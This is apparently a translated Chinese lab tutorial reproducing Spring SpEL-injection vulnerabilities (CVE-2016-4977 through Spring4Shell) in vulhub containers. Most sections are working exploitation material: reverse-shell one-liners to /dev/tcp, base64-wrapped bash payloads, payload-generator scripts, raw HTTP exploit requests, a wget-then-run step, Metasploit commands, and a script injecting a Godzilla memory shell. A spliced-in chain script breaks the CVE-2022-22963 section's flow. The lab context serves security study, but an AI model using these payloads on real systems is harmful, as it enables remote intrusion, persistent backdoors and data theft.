
# What is Spring

The Spring Framework is a powerful Java application framework built to give developers an efficient, extensible environment. It is modular, so an application pulls in only the modules it needs, and those modules cut development time: in the early days of Java web development a programmer had to write a lot of code just to insert a record into a database, whereas the JdbcTemplate from the Spring JDBC module does the same in a few lines. Because Spring is deployed everywhere, its vulnerabilities turn up constantly and are worth mastering.

Spring has five key parts: Spring Framework, Spring Boot, Spring Cloud, Spring Security and Spring MVC. Spring Framework is what people usually mean by "Spring"; it is the foundation everything else builds on and contains Spring MVC, IoC, AOP and more. Spring MVC is the MVC web framework inside Spring, used for web applications and HTTP APIs, but it historically required a lot of XML configuration, which is why Spring Boot appeared: it embeds Tomcat and ships default configuration so the developer no longer has to. (The original post shows a diagram of how these parts relate at this point.)

# Telling Spring apart from Struts2

Several ways to distinguish the two frameworks are described at https://blog.csdn.net/m0_71692682/article/details/125217602

# CVE-2016-4977: Spring Security OAuth2 remote command execution

## Overview

**Root cause.** Spring Security OAuth adds OAuth support to the Spring security stack. When it renders its whitelabel error views it passes request data through the Spring Expression Language (SpEL), so an authenticated attacker can place an expression in a request parameter and have it evaluated on the server, up to executing commands.

**Preconditions.** A low-privileged account on the target (the expression is evaluated after login).

**Affected versions.** Spring Security OAuth 1.0.0 through 1.0.5 and 2.0.0 through 2.0.9.

**Fix.** Patched releases are available; affected users should upgrade to the latest version.

Reference: https://ti.qianxin.com/vulnerability/detail/3927#patch-file
Reproduction write-up: https://blog.csdn.net/zy15667076526/article/details/111413892

## Environment setup

```bash
cd vulhub-master/spring/CVE-2016-4977
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

None of the dedicated scanners (the tools are introduced in the later sections) detect this one.

## Verification and exploitation

### Method 1

Open

```
http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
```

You are first asked for a username and password; `admin:admin` works in the vulhub image. The error page that follows contains 54289, which shows that the SpEL expression `${233*233}` was evaluated.

Next, use poc.py (method 2 below) to turn a reverse-shell command into a SpEL payload. Keep the limits of Java reverse shells in mind: `Runtime.exec` does not go through a shell, so redirections and pipes in the command line do nothing. The usual workaround is to run `bash -c` with the real command base64-encoded and with brace expansion (`{echo,...}`) standing in for spaces.

```bash
# command we want the target to run
bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
# shell-free form that Runtime.exec can launch (the base64 is the line above)
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
```

The generator spells every character of that line as `T(java.lang.Character).toString(n)` joined with `concat`, so the expression needs no quotes at all. The final URL is `http://your-ip:8080/oauth/authorize?response_type=<payload>&client_id=acme&scope=openid&redirect_uri=http://test`, which for the lab is:

```
http://192.168.229.140:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(121)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(80)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test
```

### Method 2

Following https://www.freebuf.com/articles/web/322376.html, a cleaner generator (poc.py):

```python
#!/usr/bin/env python3
import base64

# Command to run on the target, e.g. bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
message = input("Enter message to encode: ")

# Wrap it so that Runtime.exec, which does not use a shell, can still launch it:
# bash -c {echo,<base64>}|{base64,-d}|{bash,-i}
message = "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % base64.b64encode(message.encode("utf-8")).decode()
print(message)

# Spell each character as T(java.lang.Character).toString(code) so the SpEL needs no quotes
poc = "${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % ord(message[0])
for ch in message[1:]:
    poc += ".concat(T(java.lang.Character).toString(%s))" % ord(ch)
poc += ")}"
print(poc)
```

Sending the generated expression as `response_type` brings the shell back to the listener.

# CVE-2017-4971: Pivotal Spring Web Flow remote code execution

## Overview

**Root cause.** Spring Web Flow is a framework for flow-based applications (a checkout process, for example) that separates the definition of a flow from the classes and views that implement it. In the 2.4.x line, an attacker who controls a *field name* during data binding gets it evaluated as a SpEL expression, which ends in arbitrary command execution.

**Affected versions.** Spring Web Flow 2.4.0 through 2.4.4.

**Fix.** Patched releases are available; upgrade to the latest version.

Reference: https://ti.qianxin.com/vulnerability/detail/16281
Reproduction write-up: https://blog.csdn.net/zy15667076526/article/details/111413941

## Environment setup

```bash
cd vulhub-master/spring/CVE-2017-4971
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

None of the dedicated scanners detect this one.

## Verification and exploitation

Open the hotel with id 1 at `http://your-ip:8080/hotels/1`, click "Book Hotel", fill in the form and click "Process"; the web flow proper starts at this step. Log in with the credentials shown on the page.

Intercept the POST that follows and add one extra form field: the field *name* carries the payload, the value is arbitrary. Note that the request contains a CSRF token, so modify the live request in the proxy rather than replaying an old one.

Original PoC (from vulhub):

```
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
```

Variant used here. Because the request is edited in flight rather than replayed, the proxy URL-encodes the field for you; the only character you must encode yourself is `&` (as `%26`), otherwise the form parser treats it as a parameter separator:

```
_(new java.lang.ProcessBuilder("bash","-c","bash -i >%26 /dev/tcp/192.168.229.128/8888 0>%261")).start()=vulhub
```

# CVE-2017-8046: Pivotal Spring Data REST remote code execution

## Overview

**Root cause.** Spring Data REST builds on Spring Data to make it easy to expose repositories as REST-style web services. In the handler for the PATCH method, which implements RFC 6902 (JSON Patch), the `path` value of a patch operation is handed to setValue and evaluated as SpEL, so a crafted patch executes commands on the server.

**Affected versions (as listed in the advisory).** Spring Data REST 2.6.9 and 3.0.0; Spring Boot 1.5.9 and 2.0.0.

**Fix.** Patched releases are available; upgrade to the latest version.

Reference: https://ti.qianxin.com/vulnerability/detail/7347

## Environment setup

```bash
cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

A JSON document on the root URL tells you this is a RESTful API server.

REST is an architectural and design style rather than a standard: a set of principles and constraints, mainly for client/server software. Software designed in this style is simpler, better layered and easier to cache. The key idea is to define objects that represent process elements or resources; each object is addressed by a URL, and the client packs all state into every message so that the server can process requests statelessly.

## Discovery

None of the dedicated scanners detect this one.

## Verification

Open `http://your-ip:8080/customers/1` to see a resource, then modify it with a PATCH request:

```http
PATCH /customers/1 HTTP/1.1
Host: 192.168.229.140:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 200

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
```

The `path` value is a SpEL expression; the byte array `new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}` spells `touch /tmp/success`, which runs when the patch is processed.

Enter the container (`docker exec -it 256a958af3aa bash`) and confirm that `/tmp/success` now exists.

## Exploitation

Base64-encode the reverse-shell line (https://www.iamwawa.cn/base64.html is one option) and wrap it as before:

```bash
bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
```

Then turn the wrapped command into the byte list that goes into `new byte[]{...}`:

```python
",".join(map(str, map(ord, "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}")))
```

The same thing as a small script:

```python
#!/usr/bin/env python3
import base64

# Command to run on the target, e.g. bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
message = input("Command to execute: ")

# Wrap in bash -c {echo,<base64>}|{base64,-d}|{bash,-i} because Runtime.exec uses no shell
message = "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % base64.b64encode(message.encode("utf-8")).decode()
print(message + "\n")

# Byte values for the new byte[]{...} array inside the SpEL path
payload = message.encode("utf-8")
bytecode = ",".join(str(i) for i in payload)
print(bytecode)
```

# CVE-2018-1270: Spring Framework spring-messaging remote code execution

## Overview

**Root cause.** spring-messaging provides messaging support for the Spring Framework; STOMP is the application protocol and SockJS the transport underneath. A client may subscribe to a destination and attach a `selector` header to filter the messages it receives. The selector is a SpEL expression evaluated with a StandardEvaluationContext, so it can call arbitrary classes and execute commands.

**Affected versions.** Spring Framework 5.0.0 through 5.0.5 and 4.3.x up to 4.3.16, plus the many products that bundle them (the advisory lists dozens of Oracle products, Red Hat Fuse 1.0.0 and Debian 9).

**Fix.** Patched releases are available; upgrade to the latest version.

Reference: https://ti.qianxin.com/vulnerability/detail/13375
Reproduction write-up: https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1270

## Environment setup

```bash
cd vulhub-master/spring/CVE-2018-1270
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

None of the dedicated scanners detect this one.

## Verification

Most write-ups say spring-messaging communicates over WebSocket. That is not quite right: it is built on SockJS, which you can think of as a transport protocol that adapts to the browser, using WebSocket in modern browsers and AJAX (plain HTTP) in old ones. Connecting to the server therefore works like this: STOMP assembles the data into a text frame, and SockJS sends that frame over whichever channel it picked (WebSocket or xhr). So the bug can be reproduced over plain HTTP, a "dimensionality reduction" attack, as it were.

vulhub ships a small PoC, exploit.py (Python 3.6+). Since the SpEL is injected when subscribing but only fires when the server publishes to that subscription, four things have to be supplied:

1. The base URL; in vulhub it is `http://your-ip:8080/gs-guide-websocket`.
2. The SpEL to evaluate, for example `T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")`.
3. A destination to subscribe to; in vulhub it is `/topic/greetings`.
4. A way to trigger a publication to that destination. In vulhub, sending a JSON object containing `name` to `/app/hello` does it. On a real target this differs, which is why the PoC is not universal.

Adapt the PoC to your target; for the vulhub lab only the URL in step 1 needs changing.

First open `/gs-guide-websocket` on the target to confirm the endpoint answers, then download and run exploit.py.
Then enter the container (`docker exec -it 7880690e000f bash`) and confirm that `/tmp/success` was created.

## Exploitation

Generate the reverse-shell command and base64-encode it (https://www.iamwawa.cn/base64.html):

```bash
bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
```

Put that line into the exploit script in place of `touch /tmp/success` and run it again; the shell comes back.

# CVE-2018-1273: Spring Data Commons remote code execution

## Overview

**Root cause.** Spring Data is an open-source framework that simplifies database access and supports cloud services; Spring Data Commons is the base shared by all Spring Data sub-projects. Spring Data Commons up to and including 2.0.5 has a SpEL injection: the attacker controls a property name that is evaluated as an expression, and can inject a malicious SpEL expression to execute arbitrary commands.

**Affected versions.** Spring Data Commons 1.13.0 through 1.13.10 and 2.0.0 through 2.0.5; Spring Data REST 2.6.0 through 2.6.10 and 3.0.0 through 3.0.5; Apache Ignite 1.0.0 through 2.5.0.

**Fix.** Patched releases are available; upgrade to the latest version.

Reference: https://ti.qianxin.com/vulnerability/detail/13375
Reproduction write-up: https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273

## Environment setup

```bash
cd vulhub-master/spring/CVE-2018-1273
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

None of the dedicated scanners detect this one.

## Verification

Once the environment is up, `http://your-ip:8080/users` shows a user registration page. Submit the form, intercept the request and change it to the following. The injection is in the parameter *name*: `username[...]` makes the data binder evaluate the bracketed expression.

```http
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.229.140:8080
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: keep-alive

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
```

Enter the container (`docker exec -it 11544b58b4ab bash`) and confirm that `/tmp/success` was created.

## Exploitation

Use the injection to download and run a script instead of trying to pass redirections to `exec` directly. On the attacker host, write the reverse-shell line into `shell.sh` and serve it:

```bash
# contents of shell.sh
bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
# serve it on port 80
python -m http.server 80
```

Then send two requests with the payload above, first to fetch the script and then to execute it:

```bash
wget -qO /tmp/1 http://192.168.229.128/shell.sh
/bin/bash /tmp/1
```

The second command brings the shell back.

# CVE-2022-22947: Spring Cloud Gateway remote code execution

## Overview

**Root cause.** Spring Cloud Gateway is a Spring Cloud project built on Spring 5.0, Spring Boot 2.0 and Project Reactor that offers a simple, uniform way to route API traffic in a microservice architecture. When the gateway's Actuator endpoint is enabled, exposed and unprotected, anyone can create route definitions over HTTP, and filter arguments in those definitions are evaluated as SpEL when the routes are applied, which gives code execution.

**Affected versions.** Spring Cloud Gateway 3.1.0, 3.0.0 through 3.0.6, and older unsupported versions. Fixed in 3.1.1 and 3.0.7.

Reference: https://ti.qianxin.com/vulnerability/detail/238521
Reproduction write-up: https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md

## Environment setup

```bash
cd vulhub-master/spring/CVE-2022-22947
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

### Nuclei ✅

### SpringBoot-Scan ✅

Project: https://github.com/AabyssZG/SpringBoot-Scan

```bash
# exploit a single URL
python ./SpringBoot-Scan.py -v http://192.168.229.140:8080/ -v --vul
```

### SpringBootExploit ❌

Project: https://github.com/0x727/SpringBootExploit. Download the latest release archive and use it together with JNDIExploit (⭐ recommended). Usage: https://www.ddosi.org/springbootexploit/

Brute-forcing the gadget chains failed here.

### Spring_All_Reachable ✅

Project: https://github.com/savior-only/Spring_All_Reachable

Both command execution and the in-memory shell worked.

### MSF ❌

The vulnerability is present, but the module failed to exploit it:

```
search CVE-2022-22947
use exploit/linux/http/spring_cloud_gateway_rce
set RHOSTS 192.168.229.140
set LHOST 192.168.229.128
set RPORT 8080
exploit
```

### Third-party tool 1 (command execution) ✅

Source: https://github.com/d-rn/vulBox/blob/main/cve_2022_22947.py

Do not put a trailing slash on the target URL. The tool removes the malicious route when it is done.

### Third-party tool 2 (Godzilla memory shell) ✅

exp.py, source below. Again, no trailing slash on the target URL. The script runs the same create/refresh/call sequence as the manual steps, but the SpEL defines a class (the Godzilla memory-shell, base64-encoded) with `ReflectUtils.defineClass` and injects it as a handler at `/gmem`. The base64 blob is elided in the original.

```python
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import requests
import sys

# Route whose filter argument is SpEL: it defines the memory-shell class and
# maps it to /gmem through the requestMappingHandlerMapping bean.
payload = (
    '{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result",'
    '"value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass(\'ms.GMemShell\','
    'T(org.springframework.util.Base64Utils).decodeFromString(\'...\'),'   # base64 of the shell class (elided in the original)
    'new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))'
    '.doInject(@requestMappingHandlerMapping,\'/gmem\')}"}}],"uri": "http://example.com"}'
)
evilUrl = "actuator/gateway/routes/hacktest"


def creatRouter(url):
    # Step 1: register the malicious route (201 Created on success)
    trueUrl = url + evilUrl
    headers = {"Content-Type": "application/json"}
    response = requests.post(trueUrl,
                             data=payload, headers=headers, allow_redirects=False)
    return response.status_code


def reloadRouter(url):
    # Step 2: refresh routes; the SpEL is evaluated here
    trueUrl = url + "actuator/gateway/refresh"
    response = requests.post(trueUrl, allow_redirects=False)
    return response.status_code


def callRouter(url):
    # Step 3: read the route back
    trueUrl = url + evilUrl
    response = requests.get(trueUrl, allow_redirects=False)
    return response.status_code


def hack(url):
    result = creatRouter(url)
    if result != 201:
        return "unknown error: route not created (HTTP %s)" % result
    result = reloadRouter(url)
    if result != 200:
        return "unknown error: refresh failed (HTTP %s)" % result
    callRouter(url)
    # Step 4: the injected handler should now answer at /gmem
    url = url + "gmem"
    response = requests.post(url, allow_redirects=False)
    if response.status_code == 200:
        return "success: " + url
    return "unknown error: shell not reachable (HTTP %s)" % response.status_code


def main():
    print("CVE-2022-22947 one-click Godzilla memory shell, by N0phone")
    print("Example: exp.py url")
    print("For learning and authorized testing only")
    url = sys.argv[1]
    if not url.endswith("/"):
        url = url + "/"
    print(hack(url))


if __name__ == "__main__":
    main()
```

## Verification

Exploitation takes several steps.

1. Add a route that contains a malicious SpEL expression in a filter argument:

```http
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"}
```

2. Apply the new route. This request is what triggers evaluation of the SpEL:

```http
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```

3. Read the route back to see the command output:

```http
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```

4. Clean up by deleting the route:

```http
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

```

5. Refresh the routes once more so the deletion takes effect:

```http
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

```

# CVE-2022-22963: Spring Cloud Function remote code execution

## Overview

**Root cause.** Spring Cloud Function offers a uniform programming model for deploying function-based software to many platforms, including FaaS (function as a service) platforms such as AWS Lambda. When routing is in use, the value of the `spring.cloud.function.routing-expression` request header is evaluated as SpEL with a StandardEvaluationContext, so the header can carry arbitrary code.

**Affected versions.** Spring Cloud Function 3.1.x up to 3.1.6 and 3.2.x up to 3.2.2. Fixed in 3.1.7 and 3.2.3.

Reference: https://ti.qianxin.com/vulnerability/detail/238745
Reproduction write-up: https://www.freebuf.com/vuls/344989.html

## Environment setup

```bash
cd vulhub-master/spring/CVE-2022-22963
docker-compose up -d
docker ps
# tear down when finished
docker-compose down
```

## Discovery

### Nuclei ✅

### SpringBoot-Scan ✅

Project: https://github.com/AabyssZG/SpringBoot-Scan

```bash
# exploit a single URL
python ./SpringBoot-Scan.py -v http://192.168.229.140:8080/ -v --vul
```

### SpringBootExploit ❌

Project: https://github.com/0x727/SpringBootExploit. Download the latest release archive and use it together with JNDIExploit (⭐ recommended). Usage: https://www.ddosi.org/springbootexploit/

### Spring_All_Reachable ✅

Project: https://github.com/savior-only/Spring_All_Reachable

Command execution works but is limited.

### MSF ✅

The module's check does not confirm the vulnerability on its own, so `ForceExploit` is set; exploitation then succeeds:

```
search CVE-2022-22963
use exploit/multi/http/spring_cloud_function_spel_injection
set RHOSTS 192.168.229.140
set LHOST 192.168.229.128
set RPORT 8080
set ForceExploit true
exploit
```

### Third-party tool 1 (command execution) ✅

Source: https://github.com/charis3306/CVE-2022-22963 (Spring-cloud-function-spel.py)
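The five-step Spring Cloud Gateway chain from the CVE-2022-22947 section above, as an added example (not vulhub's requests and not the exp.py shown there): the SpEL is built from an argv list so the quoting is handled once, the transport is a plain `send(method, path, headers, body) -> (status, text)` callable so it runs against `requests`, `urllib` or a test double, and the route is deleted in a `finally` block so an aborted run does not leave it behind. The shape of the echoed route in step 3 (`filters` rendered as `[[AddResponseHeader Result = '<output>'], order = 1]`) follows vulhub's write-up and is an assumption about the target's version.

```python
"""CVE-2022-22947: create -> refresh -> read -> delete -> refresh, as code."""
import json
import re

ROUTES = "/actuator/gateway/routes/"
REFRESH = "/actuator/gateway/refresh"


def spel_exec(argv):
    """SpEL that runs argv with Runtime.exec (String[] form, no shell) and returns stdout
    as a String. Double quotes are used for the SpEL string literals and json.dumps escapes
    them for the JSON body. A double quote *inside* an argument would need SpEL's own
    doubling rule, so such arguments are refused instead of being mis-quoted."""
    for arg in argv:
        if '"' in arg:
            raise ValueError("double quotes in arguments are not supported: %r" % arg)
    args = ",".join('"%s"' % arg for arg in argv)
    return ("#{new String(T(org.springframework.util.StreamUtils).copyToByteArray("
            "T(java.lang.Runtime).getRuntime().exec(new String[]{%s}).getInputStream()))}" % args)


def route_definition(route_id, value):
    """Route whose AddResponseHeader argument is evaluated as SpEL when routes are refreshed."""
    return {"id": route_id,
            "filters": [{"name": "AddResponseHeader",
                         "args": {"name": "Result", "value": value}}],
            "uri": "http://example.com"}


# Assumed rendering of the filter in GET /actuator/gateway/routes/<id> (see lead-in).
RESULT_RE = re.compile(r"AddResponseHeader Result = '(.*)'\], order", re.S)


def extract_output(route_text):
    """Pull the command output out of the route echoed by the actuator, or None."""
    for entry in json.loads(route_text).get("filters", []):
        match = RESULT_RE.search(entry if isinstance(entry, str) else json.dumps(entry))
        if match:
            return match.group(1)
    return None


def run_chain(send, route_id, argv):
    """Drive the chain through `send`. Raises RuntimeError when the actuator refuses the
    route or the refresh; always removes the route afterwards."""
    route = ROUTES + route_id
    body = json.dumps(route_definition(route_id, spel_exec(argv)))
    status, _ = send("POST", route, {"Content-Type": "application/json"}, body)
    if status != 201:
        raise RuntimeError("route not created (HTTP %s): is the gateway actuator exposed?" % status)
    try:
        status, _ = send("POST", REFRESH, {}, "")          # the SpEL runs here
        if status != 200:
            raise RuntimeError("refresh failed (HTTP %s)" % status)
        status, text = send("GET", route, {}, "")
        return extract_output(text) if status == 200 else None
    finally:
        send("DELETE", route, {}, "")                       # clean up, then apply the removal
        send("POST", REFRESH, {}, "")


def requests_sender(base_url):
    """Adapter for the `requests` library (assumed installed); base_url without trailing slash."""
    import requests

    def send(method, path, headers, body):
        resp = requests.request(method, base_url + path, headers=headers, data=body,
                                allow_redirects=False, timeout=10)
        return resp.status_code, resp.text
    return send


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.229.140:8080"
    print(run_chain(requests_sender(target.rstrip("/")), "hacktest", ["id"]))
```

`extract_output` returns `None` rather than guessing when the echoed route does not match the assumed format; in that case read the raw GET response, since the command has already run by then.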
```bash
# check whether the target is vulnerable
python ./Spring-cloud-function-spel.py --check post --url http://192.168.229.140:8080/
# try command execution
python ./Spring-cloud-function-spel.py --check post --url http://192.168.229.140:8080/ --cmd "curl http://192.168.229.128/whoami"
# try a reverse shell
python ./Spring-cloud-function-spel.py --check post --url http://192.168.229.140:8080/ --ip 192.168.229.128 --port 9999
```

### Third-party tool 2 (reverse shell) ✅

Project: https://github.com/mamba-2021/EXP-POC/blob/main/Spring-cloud-function-SpEL-RCE/Spel_RCE_Bash_EXP.py (Spel_RCE_Bash_EXP.py)

## Verification and exploitation

Send the following request; the SpEL in the `spring.cloud.function.routing-expression` header is evaluated:

```http
POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test
```

Enter the container (`docker exec -it 8d3b1b7ae9d7 bash`) and confirm that `/tmp/success` was created.

For a reverse shell, put the wrapped command in the header instead:

```bash
bash -i >& /dev/tcp/192.168.229.128/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyOS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
```

# CVE-2022-22965: Spring4Shell

## Overview

**Root cause.** Spring Framework has a remote code execution vulnerability: on JDK 9 and later, a remote attacker can abuse data binding to reach the class loader through a request parameter and write malicious content to the server, which leads to code execution.

For more detail see the Qianxin notice "Spring Framework remote code execution vulnerability (CVE-2022-22965) security risk notice, third update".

**Timeline.** On the evening of 29 March 2022 a remote code execution vulnerability in Spring Framework (CVE-2022-22965) was detected; any derivative product that depends on Spring Framework is affected. Late that night domestic security researchers reproduced and confirmed it.

- 29 March 2022 (evening): the vulnerability is spotted by domestic researchers and analysed and reproduced immediately. Because of the enormous exposure it is rated "critical", but no fixed release exists yet.
- 30 March 2022: technical details and a PoC become public, and exploitation in the wild is observed.
